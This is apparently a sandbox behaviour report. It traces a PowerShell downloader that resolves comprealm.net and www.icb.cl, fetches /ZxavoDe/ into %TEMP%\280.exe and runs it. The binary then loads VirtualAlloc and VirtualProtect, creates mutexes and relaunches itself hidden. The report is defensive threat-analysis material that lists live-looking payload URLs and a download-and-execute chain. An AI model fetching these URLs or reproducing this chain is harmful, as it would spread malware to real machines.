Environment Get Environment String name = MshEnableTrace False 7
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Thread 0xa34
12 6
»
Category Operation Information Success Count Logfile
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Module Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Module Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Thread 0xa90
153 77
»
Category Operation Information Success Count Logfile
Environment Get Environment String name = MshEnableTrace False 21
Fn
Environment Get Environment String name = COmSpeC, result_out = C:\Windows\system32\cmd.exe True 2
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Environment Get Environment String name = temp, result_out = C:\Users\kFT6uTQW\AppData\Local\Temp True 2
Fn
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 260 True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 True 1
Fn
Data
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.exe, size = 260 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowersHell.config, type = file_attributes False 2
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = file_type True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Module Map process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System Get Info type = Operating System True 2
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking False 1
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = comprealm.net, address_out = 184.168.46.18 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = file_type True 2
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = www.icb.cl, address_out = 190.196.2.210 True 1
Fn
Socket Connect remote_address = 190.196.2.210, remote_port = 80 False 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 68, size_out = 68 True 1
Fn
Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = www.icb.cl, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /ZxavoDe/ True 1
Fn
Inet Send HTTP Request headers = host: www.icb.cl, connection: Keep-Alive, url = www.icb.cl/ZxavoDe/ True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 4616 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 4616 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4268 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7260 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7260 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4616 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7260 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7260 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 5808 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 5808 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 5136 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1452 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2904 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 64736, size_out = 2904 True 1
Fn
Data
Inet Read Response size = 64736, size_out = 2904 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 61832, size_out = 23608 True 1
Fn
Data
Inet Read Response size = 61832, size_out = 23608 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 21484 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 38224, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 38224, size_out = 2920 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 35304, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 35304, size_out = 2920 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 32384, size_out = 2920 True 1
Fn
Data
Inet Read Response size = 32384, size_out = 2920 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 29464, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 29464, size_out = 1452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 28012, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 28012, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 26544, size_out = 1452 True 1
Fn
Data
Inet Read Response size = 26544, size_out = 1452 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 25092, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 25092, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 23624, size_out = 7292 True 1
Fn
Data
Inet Read Response size = 23624, size_out = 7292 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 5508 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 16332, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 16332, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 14864, size_out = 7292 True 1
Fn
Data
Inet Read Response size = 14864, size_out = 7292 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 4664 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 7572, size_out = 5840 True 1
Fn
Data
Inet Read Response size = 7572, size_out = 5840 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 5840 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 1732, size_out = 1468 True 1
Fn
Data
Inet Read Response size = 1732, size_out = 1468 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 264, size_out = 264 True 1
Fn
Data
Inet Read Response size = 264, size_out = 264 True 1
Fn
Data
File Write filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 1732 True 1
Fn
Data
Environment Get Environment String name = MshEnableTrace False 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = file_attributes True 3
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 2
Fn
Process Get Info type = PROCESS_BASIC_INFORMATION True 1
Fn
Thread 0xb3c
1 0
»
Category Operation Information Success Count Logfile
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, show_window = SW_SHOWNORMAL True 1
Fn
Process #3: 280.exe
348 0
»
Information Value
ID #3
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:15, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:53
OS Process Information
»
Information Value
PID 0xb40
Parent PID 0xa08 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B44
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001bcfff Private Memory Readable, Writable, Executable True False False -
private_0x00000000001c0000 0x001c0000 0x001ccfff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0027ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000280000 0x00280000 0x00287fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x00860fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000870000 0x00870000 0x01c6ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c70000 0x01f3efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb44
192 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System Get Time type = Ticks, time = 192162 True 3
Fn
System Get Time type = Ticks, time = 192177 True 87
Fn
System Get Time type = Ticks, time = 192193 True 66
Fn
System Get Time type = Ticks, time = 192208 True 22
Fn
System Get Time type = Ticks, time = 192224 True 71
Fn
System Get Time type = Ticks, time = 195672 True 1
Fn
System Get Time type = Ticks, time = 195687 True 4
Fn
System Get Time type = Ticks, time = 195703 True 12
Fn
System Get Time type = Ticks, time = 195718 True 11
Fn
Mutex Create mutex_name = PEMA08 True 1
Fn
Mutex Create mutex_name = PEMB40 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 260 True 1
Fn
System Get Time type = Ticks, time = 195734 True 1
Fn
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, os_pid = 0xb50, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1
Fn
Process #4: 280.exe
617 0
»
Information Value
ID #4
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:19, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:49
OS Process Information
»
Information Value
PID 0xb50
Parent PID 0xb40 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B54
0x B58
0x B5C
0x B60
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
